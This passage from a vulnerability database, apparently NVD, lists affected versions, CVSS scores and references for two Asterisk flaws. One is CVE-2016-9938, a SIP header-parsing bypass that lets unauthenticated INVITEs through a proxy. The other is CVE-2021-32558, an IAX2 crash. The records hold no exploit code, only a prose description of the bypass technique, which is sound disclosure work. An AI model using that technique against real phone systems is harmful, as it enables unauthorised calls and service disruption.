              "matchCriteriaId": "84202BAF-29E1-472B-B11F-B73F6A8891CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FFC7120D-E6A0-4801-A1CC-3E143896EE72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "BAF2A83D-D9AE-441D-8D4E-335BF9D28A63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F5C1479-A540-4B7D-B00C-BD35EEC83BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC12556C-5E82-47D7-87E5-FBDC01A920DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "461C1D2D-C4C1-4FF8-8231-38A2505F3523",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "66595711-8573-4A9B-A8FE-4943E3097AA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FE3D4-A0B9-475A-9B89-B0222283A6A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9670B5AC-CBD1-484C-90F8-69B1A60B6054",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE5794B6-246C-415E-8E20-56447F152488",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E726CA39-A763-4422-B59E-E9E12518EA4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "206F1DC9-9E8F-4497-A354-4A14711993DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D428364-E2AD-4BC6-9329-71793BC0EB61",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "08963910-E0BD-4487-B669-60E0BFA79863",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3BD16A9-24BC-4FC1-81BA-A6D1FEF38D35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D413741-BDB7-496D-A01B-75E2A98FDB5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "29130F7F-DE00-43E1-A4A6-8F1F95D5CB19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "25E94EC0-F577-4B2B-8B11-DC76278CDD42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "101AD474-9B89-483D-84E8-08012677C55C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D57E41F6-C2CF-4183-A78A-9531A88FB65D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB1F9BB8-F951-427E-B770-69C2ACEBDB28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C4CE405-E923-4C9C-849A-D1031C4DB493",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "04ECDFF1-9718-4FAE-B45B-4F8CCA82829E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D2C4DA60-5701-4BD0-B2F9-D93B9E64111F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B12834D-2AF1-4AD1-AB23-859CAA5D3210",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E39BAA74-50A8-4087-8FF8-7C5922121319",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F596E34-529A-41AD-AD51-C1D7EEE0FFF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "EC1BE0BB-A469-4DB6-88CF-80A065329C65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4EA68726-87EF-490F-BBB8-A321E6C7A16D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1C8B3572-D6F6-45BD-9BE4-D532F9BF134E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7738E036-DACC-42EE-B417-CB083319B0A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A6847720-D556-49D7-BD7F-E0559C6F5780",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA81D724-584B-4863-B270-869C415DB5BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C0344FE7-952A-4BC5-A31F-F2C5EABDB5FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "00F26342-110F-4163-AD11-98AA3B71D299",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8652FA73-2F02-401C-890F-0544276294D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CF76131B-DF2C-4C6A-8E6B-1319D231402D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9AB8C209-694F-41BF-9CF2-D68D4E58A43C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6438A881-C806-4CC1-9828-C34BBB0FF332",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2704EED6-C72D-427D-AD37-EBC4042CDD76",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AF835684-26C6-4734-B586-D5DB4DF33072",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4EB76BC0-2B72-495E-80FC-C6B194648A91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9F1BC546-92E0-4285-8C18-37705F44B94E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D50F0DF-54D3-4883-ADA2-DDB79F786182",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0838BEC6-680A-4695-BD1B-309290F16A3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "82F78D49-ED8C-43FF-AE6D-713E90F1A1BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:lts:*:*:*",
              "matchCriteriaId": "BB47EA31-CF9D-4752-804B-7804151EC87C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:lts:*:*:*",
              "matchCriteriaId": "A1C9B744-1745-4E9D-A2DE-4659295508D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:lts:*:*:*",
              "matchCriteriaId": "BFFD88AD-C82E-4C5C-9C4F-8A49176E3E52",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:lts:*:*:*",
              "matchCriteriaId": "6797C78B-BB9A-46B4-8F0B-492FB1988BB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:lts:*:*:*",
              "matchCriteriaId": "10A38D53-6C8E-493E-8207-F4CF7D754A5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:lts:*:*:*",
              "matchCriteriaId": "4CC0C753-9179-4C71-AFD8-C4601D8C865A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "CAD17809-CBB1-4E41-99C9-20FE56853563",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:lts:*:*:*",
              "matchCriteriaId": "066453F2-A77F-4E82-8C91-AC17FAA21A89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk Open Source 11.x before 11.25.1, 13.x before 13.13.1, and 14.x before 14.2.1 and Certified Asterisk 11.x before 11.6-cert16 and 13.x before 13.8-cert4. The chan_sip channel driver has a liberal definition for whitespace when attempting to strip the content between a SIP header name and a colon character. Rather than following RFC 3261 and stripping only spaces and horizontal tabs, Asterisk treats any non-printable ASCII character as if it were whitespace. This means that headers such as Contact\\x01: will be seen as a valid Contact header. This mostly does not pose a problem until Asterisk is placed in tandem with an authenticating SIP proxy. In such a case, a crafty combination of valid and invalid To headers can cause a proxy to allow an INVITE request into Asterisk without authentication since it believes the request is an in-dialog request. However, because of the bug described above, the request will look like an out-of-dialog request to Asterisk. Asterisk will then process the request as a new call. The result is that Asterisk can process calls from unvetted sources without any authentication. If you do not use a proxy for authentication, then this issue does not affect you. If your proxy is dialog-aware (meaning that the proxy keeps track of what dialogs are currently valid), then this issue does not affect you. If you use chan_pjsip instead of chan_sip, then this issue does not affect you."
    },
    {
      "lang": "es",
      "value": "Se descubri\u00f3 un problema en Asterisk Open Source 11.x en versiones anteriores a 11.25.1, 13.x en versiones anteriores a 13.13.1 y 14.x en versiones anteriores a 14.2.1 y Certified Asterisk 11.x en versiones anteriores a 11.6-cert16 y 13.x en versiones anteriores a 13.8-cert4. El controlador de canal chan_sip tiene una definici\u00f3n liberal de espacios en blanco cuando intenta quitar al contenido entre un nombre de encabezado SIP y un car\u00e1cter de dos puntos. En lugar de seguir la RFC 3261 y quitar s\u00f3lo espacios y pesta\u00f1as horizontales, Asterisk trata cualquier car\u00e1cter ASCII no imprimible como si fuera un espacio en blanco. Esto significa que los encabezados tal como Contact\\x01: se ver\u00e1n como un encabezado de Contact v\u00e1lido. Esto principalmente no plantea un problema hasta que Asterisk se coloca en t\u00e1ndem con un proxy SIP de autenticaci\u00f3n. En este caso, una combinaci\u00f3n h\u00e1bil de encabezados v\u00e1lidos y no v\u00e1lidos puede provocar que un proxy permita una petici\u00f3n INVITE en Asterisk sin autenticaci\u00f3n ya que cree que la solicitud es una petici\u00f3n de dialogo de entrada. Sin embargo, debido al error descrito anteriormente, la petici\u00f3n se ver\u00e1 como una solicitud fuera de di\u00e1logo para Asterisk. Asterisk procesara la solicitud como una nueva llamada. El resultado es que Asterisk pueda procesar llamadas desde fuentes de fuentes no examinadas sin autenticaci\u00f3n. Si no utiliza un proxy para la autenticaci\u00f3n, entonces este problema no le afecta. Si su proxy tiene conocimiento de di\u00e1logo (lo que siginifica que el proxy realiza un seguimiento de los cuadros de di\u00e1logos que son actualmente v\u00e1lidos), entonces este problema no le afecta. Si utiliza chan_pjsip en lugar de chan_sip, entonces este problema no le afecta."
    }
  ],
  "id": "CVE-2016-9938",
  "lastModified": "2024-11-21T03:02:02.820",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": true,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2016-12-12T21:59:01.617",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-009.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/94789"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1037408"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-009.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/94789"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1037408"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-285"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2021-07-30 14:15

Modified

2024-11-21 06:07

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html	Patch, Third Party Advisory, VDB Entry
cve@mitre.org	http://seclists.org/fulldisclosure/2021/Jul/49	Mailing List, Patch, Third Party Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2021-008.html	Patch, Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29392	Exploit, Issue Tracking, Patch, Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html	Mailing List, Third Party Advisory
cve@mitre.org	https://www.debian.org/security/2021/dsa-4999	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html	Patch, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2021/Jul/49	Mailing List, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2021-008.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29392	Exploit, Issue Tracking, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2021/dsa-4999	Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
debian	debian_linux	9.0
debian	debian_linux	11.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2D4276A5-AE30-4AE2-9DC2-4742063B1DAA",
              "versionEndExcluding": "13.38.3",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AEDB7BB2-CA84-4AF4-A91A-37FCDAED7E7D",
              "versionEndExcluding": "16.19.1",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "35D9931E-4BDC-4679-A879-21C59F79E85C",
              "versionEndExcluding": "17.9.4",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "4452C0A6-3082-4F14-96B0-73CC70EF1277",
              "versionEndExcluding": "18.15.1",
              "versionStartIncluding": "18.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:-:*:*:*:*:*:*",
              "matchCriteriaId": "81C3E390-8B99-4EB8-82DD-02893611209A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "17DB2297-1908-4F87-8046-2BAA74569D71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CEA2CC40-C2F6-4828-82F0-1B50D3E61F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32F19F43-C1E8-4B6C-9356-AF355B7320BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "21D1FA32-B441-485F-8AE9-F3A394626909",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F7795CCF-B160-4B4F-9529-1192C11D7FDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "0C5E5D0D-9EB3-40FD-8B7E-E93A95D07AB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7DFDA30-DD61-4BBC-AFE4-448BF2A4F303",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "142F1F89-49AC-4A0B-A273-61F697063A5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "53041795-788C-4914-A2F6-41539ABE0244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FBB98E65-B2D0-49A4-8BF3-12155E3E13C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "769C854C-03CD-40A9-B39B-C0CDCA8252EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6D86AD6E-4E07-48B0-88D8-E18F277FFE6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "7A643445-8A73-4ACC-8A96-CA8D6AC8B229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "BD980324-52E2-4D3E-B8D8-52A2DB100306",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "4D5B8321-033A-47C5-A277-BE056C5ADB30",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "12A2585A-A13F-4FD5-9A65-273B7D8A99C8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
    },
    {
      "lang": "es",
      "value": "Se ha detectado un problema en Sangoma Asterisk versiones: 13.x  anteriores a 13.38.3, versiones 16.x anteriores a 16.19.1, versiones 17.x anteriores a 17.9.4, y versiones 18.x anteriores a 18.5.1, y Certified Asterisk versiones anteriores a 16.8-cert10. Si el controlador del canal IAX2 recibe un paquete que contiene un formato de medios no compatible, puede ocurrir un bloqueo"
    }
  ],
  "id": "CVE-2021-32558",
  "lastModified": "2024-11-21T06:07:16.057",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
